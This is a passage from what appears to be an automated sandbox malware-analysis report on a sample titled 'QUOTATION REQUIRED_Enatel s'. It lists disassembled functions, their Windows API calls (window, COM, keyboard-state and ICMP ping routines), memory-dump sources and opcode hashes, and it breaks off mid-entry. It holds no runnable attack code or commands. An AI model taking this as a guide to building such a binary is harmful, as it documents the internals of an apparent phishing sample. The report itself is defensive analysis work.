                                                                                                                    • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00F75DCF
                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00F75DDD
                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00F75DEF
                                                                                                                    • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00F75E31
                                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 00F75E44
                                                                                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00F75E5A
                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00F75E67
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3096461208-0
                                                                                                                    • Opcode ID: dd5fc85f656487f4b9a02a602d2ffca6d2b86695b3b6e4037111fb564d465db0
                                                                                                                    • Instruction ID: 20723c6aa33528cb24800145e60f7196820ce517b93f52c40a2d7e1aeea0d83e
                                                                                                                    • Opcode Fuzzy Hash: dd5fc85f656487f4b9a02a602d2ffca6d2b86695b3b6e4037111fb564d465db0
                                                                                                                    • Instruction Fuzzy Hash: 3151FDB1E00609AFDF18CF68DD89AAEBBB5FB48710F148129F519E7290D7709E04DB91
                                                                                                                    Function 00F28BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F28F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00F28BE8,?,00000000,?,?,?,?,00F28BBA,00000000,?), ref: 00F28FC5
                                                                                                                    • DestroyWindow.USER32(?), ref: 00F28C81
                                                                                                                    • KillTimer.USER32(00000000,?,?,?,?,00F28BBA,00000000,?), ref: 00F28D1B
                                                                                                                    • DestroyAcceleratorTable.USER32(00000000), ref: 00F66973
                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00F28BBA,00000000,?), ref: 00F669A1
                                                                                                                    • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00F28BBA,00000000,?), ref: 00F669B8
                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00F28BBA,00000000), ref: 00F669D4
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00F669E6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 641708696-0
                                                                                                                    • Opcode ID: 71a07e1f97c80ca1ecd0b84a38c7903ca708c0f0be3fb107785658bdc0e561fd
                                                                                                                    • Instruction ID: 693329cc880dd042a12cde1355d877f349e7029ac7ac17358a3c95f5d2aaa993
                                                                                                                    • Opcode Fuzzy Hash: 71a07e1f97c80ca1ecd0b84a38c7903ca708c0f0be3fb107785658bdc0e561fd
                                                                                                                    • Instruction Fuzzy Hash: D861CD31902668DFDB259F25EA88B29B7F1FB41362F14851DE0429B560CB35AD82FF90
                                                                                                                    Function 00F29838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F29944: GetWindowLongW.USER32(?,000000EB), ref: 00F29952
                                                                                                                    • GetSysColor.USER32(0000000F), ref: 00F29862
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ColorLongWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 259745315-0
                                                                                                                    • Opcode ID: d1eab0cbd18c765409f24ddde9dc467e52fb477c3ea16ced3e9f7dd6ab0d1634
                                                                                                                    • Instruction ID: 19da1f8c25153c4cf7d2b4f39bb38598868697d8216c51a6bfdfedda8ffea445
                                                                                                                    • Opcode Fuzzy Hash: d1eab0cbd18c765409f24ddde9dc467e52fb477c3ea16ced3e9f7dd6ab0d1634
                                                                                                                    • Instruction Fuzzy Hash: 4E41C4719086549FDB209F38AC88BF93BA5EB17330F584655F9A2872E2C7719C42FB50
                                                                                                                    Function 00F796E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,00F5F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00F79717
                                                                                                                    • LoadStringW.USER32(00000000,?,00F5F7F8,00000001), ref: 00F79720
                                                                                                                      • Part of subcall function 00F19CB3: _wcslen.LIBCMT ref: 00F19CBD
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00F5F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00F79742
                                                                                                                    • LoadStringW.USER32(00000000,?,00F5F7F8,00000001), ref: 00F79745
                                                                                                                    • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00F79866
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleLoadModuleString$Message_wcslen
                                                                                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                    • API String ID: 747408836-2268648507
                                                                                                                    • Opcode ID: 8582aa3f8eafa69c2fb6970335afecae999818136ccd365cc718a80c51fb8c3d
                                                                                                                    • Instruction ID: e8f3fc8f8e0d2073ad2b8631416c4659e5dc8dd93420a0df7f78697d1609108a
                                                                                                                    • Opcode Fuzzy Hash: 8582aa3f8eafa69c2fb6970335afecae999818136ccd365cc718a80c51fb8c3d
                                                                                                                    • Instruction Fuzzy Hash: BB419672804219AACF04FBE0DD52DEE7378EF15350F504026F605B2092EB796F88EBA1
                                                                                                                    Function 00F93C30 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00F93C5C
                                                                                                                    • CoInitialize.OLE32(00000000), ref: 00F93C8A
                                                                                                                    • CoUninitialize.OLE32 ref: 00F93C94
                                                                                                                    • _wcslen.LIBCMT ref: 00F93D2D
                                                                                                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 00F93DB1
                                                                                                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 00F93ED5
                                                                                                                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00F93F0E
                                                                                                                    • CoGetObject.OLE32(?,00000000,00FAFB98,?), ref: 00F93F2D
                                                                                                                    • SetErrorMode.KERNEL32(00000000), ref: 00F93F40
                                                                                                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00F93FC4
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00F93FD8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 429561992-0
                                                                                                                    • Opcode ID: 79873f2a8aae80326f6f7c4ce53d3a2ac0940e91cd1b7631a34e04f3902f1009
                                                                                                                    • Instruction ID: 0c16f0b591482791b3e553c6de31969531d24a3e1dc8bd011d5b2e4b5cd7d7a8
                                                                                                                    • Opcode Fuzzy Hash: 79873f2a8aae80326f6f7c4ce53d3a2ac0940e91cd1b7631a34e04f3902f1009
                                                                                                                    • Instruction Fuzzy Hash: 58C147716083059FDB00DF68C88492BB7E9FF89758F00491DF98A9B250DB31EE45DB92
                                                                                                                    Function 00F87A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CoInitialize.OLE32(00000000), ref: 00F87AF3
                                                                                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00F87B8F
                                                                                                                    • SHGetDesktopFolder.SHELL32(?), ref: 00F87BA3
                                                                                                                    • CoCreateInstance.OLE32(00FAFD08,00000000,00000001,00FD6E6C,?), ref: 00F87BEF
                                                                                                                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00F87C74
                                                                                                                    • CoTaskMemFree.OLE32(?,?), ref: 00F87CCC
                                                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00F87D57
                                                                                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00F87D7A
                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00F87D81
                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00F87DD6
                                                                                                                    • CoUninitialize.OLE32 ref: 00F87DDC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2762341140-0
                                                                                                                    • Opcode ID: 15a0dae546e3827789e98dabb2de8540658057ced2d482a51865345592732ca1
                                                                                                                    • Instruction ID: 7668f9e2d62ae3e3e7aaf1bee10aec43d2825f789c39a8cca2eb7006d0b64f9f
                                                                                                                    • Opcode Fuzzy Hash: 15a0dae546e3827789e98dabb2de8540658057ced2d482a51865345592732ca1
                                                                                                                    • Instruction Fuzzy Hash: 61C13C75A04209AFCB14EFA4C884DAEBBF9FF49314B148499E819DB361D734EE41DB90
                                                                                                                    Function 00FA541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00FA5504
                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00FA5515
                                                                                                                    • CharNextW.USER32(00000158), ref: 00FA5544
                                                                                                                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00FA5585
                                                                                                                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00FA559B
                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00FA55AC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$CharNext
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1350042424-0
                                                                                                                    • Opcode ID: b608b328989b13a9b1395224062f965a1f2f6bb7943005e9580c7807ca4569a2
                                                                                                                    • Instruction ID: 21150df50cbd2ea1e9cccd6ff8521dc08e8cc868c4022360ed0dcc5f65ec9ba2
                                                                                                                    • Opcode Fuzzy Hash: b608b328989b13a9b1395224062f965a1f2f6bb7943005e9580c7807ca4569a2
                                                                                                                    • Instruction Fuzzy Hash: AC617AB5900608EFDF10DF54CC84AFE7BB9EF0BB24F144145F925AA290D7749A80EBA1
                                                                                                                    Function 00F6FA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00F6FAAF
                                                                                                                    • SafeArrayAllocData.OLEAUT32(?), ref: 00F6FB08
                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00F6FB1A
                                                                                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 00F6FB3A
                                                                                                                    • VariantCopy.OLEAUT32(?,?), ref: 00F6FB8D
                                                                                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 00F6FBA1
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00F6FBB6
                                                                                                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 00F6FBC3
                                                                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00F6FBCC
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00F6FBDE
                                                                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00F6FBE9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2706829360-0
                                                                                                                    • Opcode ID: 3eb6bd866d19b38830bae574ee011d9845f806be38ca6f16e48113a3b58ad32b
                                                                                                                    • Instruction ID: 8cea5bf8569c71aa4b6d4d9bd912986544dd6214946e79738b6841291cd7cf25
                                                                                                                    • Opcode Fuzzy Hash: 3eb6bd866d19b38830bae574ee011d9845f806be38ca6f16e48113a3b58ad32b
                                                                                                                    • Instruction Fuzzy Hash: BF414E75A00219DFCB00DFA8DC549EEBBB9FF49354F008069E956A7261CB34E945EBA0
                                                                                                                    Function 00F79C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetKeyboardState.USER32(?), ref: 00F79CA1
                                                                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00F79D22
                                                                                                                    • GetKeyState.USER32(000000A0), ref: 00F79D3D
                                                                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00F79D57
                                                                                                                    • GetKeyState.USER32(000000A1), ref: 00F79D6C
                                                                                                                    • GetAsyncKeyState.USER32(00000011), ref: 00F79D84
                                                                                                                    • GetKeyState.USER32(00000011), ref: 00F79D96
                                                                                                                    • GetAsyncKeyState.USER32(00000012), ref: 00F79DAE
                                                                                                                    • GetKeyState.USER32(00000012), ref: 00F79DC0
                                                                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00F79DD8
                                                                                                                    • GetKeyState.USER32(0000005B), ref: 00F79DEA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: State$Async$Keyboard
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 541375521-0
                                                                                                                    • Opcode ID: 8c1073041c1dd52d0568cc73f5d9ac12e4f63fc1092c4ba03e11c064733c484a
                                                                                                                    • Instruction ID: 32b0c06d9391f8406750dbd87ea491eeb917cbd1026672604f9a4580f8fdb7a0
                                                                                                                    • Opcode Fuzzy Hash: 8c1073041c1dd52d0568cc73f5d9ac12e4f63fc1092c4ba03e11c064733c484a
                                                                                                                    • Instruction Fuzzy Hash: 8C41D874D0C7CA6DFF31876484043B5BEA06B12364F08C05BDACA566C2EBE499C4E7A3
                                                                                                                    Function 00F9055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • WSAStartup.WSOCK32(00000101,?), ref: 00F905BC
                                                                                                                    • inet_addr.WSOCK32(?), ref: 00F9061C
                                                                                                                    • gethostbyname.WSOCK32(?), ref: 00F90628
                                                                                                                    • IcmpCreateFile.IPHLPAPI ref: 00F90636
                                                                                                                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00F906C6
                                                                                                                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00F906E5
                                                                                                                    • IcmpCloseHandle.IPHLPAPI(?), ref: 00F907B9
                                                                                                                    • WSACleanup.WSOCK32 ref: 00F907BF
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                    • String ID: Ping
                                                                                                                    • API String ID: 1028309954-2246546115
                                                                                                                    • Opcode ID: f6b789fed822473bd576c8bd147c638033573590e974d682b597b6822ef97268
                                                                                                                    • Instruction ID: 12e2d03363fbf8cef500e97e57f73fb2a3221813eb086b965ea12ff4c7011f47
                                                                                                                    • Opcode Fuzzy Hash: f6b789fed822473bd576c8bd147c638033573590e974d682b597b6822ef97268
                                                                                                                    • Instruction Fuzzy Hash: 57919175A042019FEB10CF15C888F16BBE0AF44328F1585A9F4698B6A2CB34FC45DF92
                                                                                                                    Function 00F98CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$BuffCharLower
                                                                                                                    • String ID: cdecl$none$stdcall$winapi
                                                                                                                    • API String ID: 707087890-567219261
                                                                                                                    • Opcode ID: 5c3f110b33cc30d78fb69ffad6749dcc7ab0f888d2f59645d18575913084aa82
                                                                                                                    • Instruction ID: e41939aa086541f6f1e3d560f1090c729afbc6e2192dce7d92c9b85b7af66a52
                                                                                                                    • Opcode Fuzzy Hash: 5c3f110b33cc30d78fb69ffad6749dcc7ab0f888d2f59645d18575913084aa82
                                                                                                                    • Instruction Fuzzy Hash: 0851B332E001169BDF14EFA8C8509BEB7A5BF663B0B24422AE416E72C4DB35DD41E790
                                                                                                                    Function 00F9372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CoInitialize.OLE32 ref: 00F93774
                                                                                                                    • CoUninitialize.OLE32 ref: 00F9377F
                                                                                                                    • CoCreateInstance.OLE32(?,00000000,00000017,00FAFB78,?), ref: 00F937D9
                                                                                                                    • IIDFromString.OLE32(?,?), ref: 00F9384C
                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00F938E4
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00F93936
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                    • API String ID: 636576611-1287834457
                                                                                                                    • Opcode ID: 484cd092a8a294d9f5654280ed03601c6819937100a538bfad4866d684f09012
                                                                                                                    • Instruction ID: a7f8bfe8f97b7fc21370cb19ac6f373993c8e2df281d610031893ae0de2c4240
                                                                                                                    • Opcode Fuzzy Hash: 484cd092a8a294d9f5654280ed03601c6819937100a538bfad4866d684f09012
                                                                                                                    • Instruction Fuzzy Hash: B661A1B2608311AFE711DF54C848F6ABBE8EF49710F044809F9859B291D774EE48EB93
                                                                                                                    Function 00F83388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00F833CF
                                                                                                                      • Part of subcall function 00F19CB3: _wcslen.LIBCMT ref: 00F19CBD
                                                                                                                    • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00F833F0
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
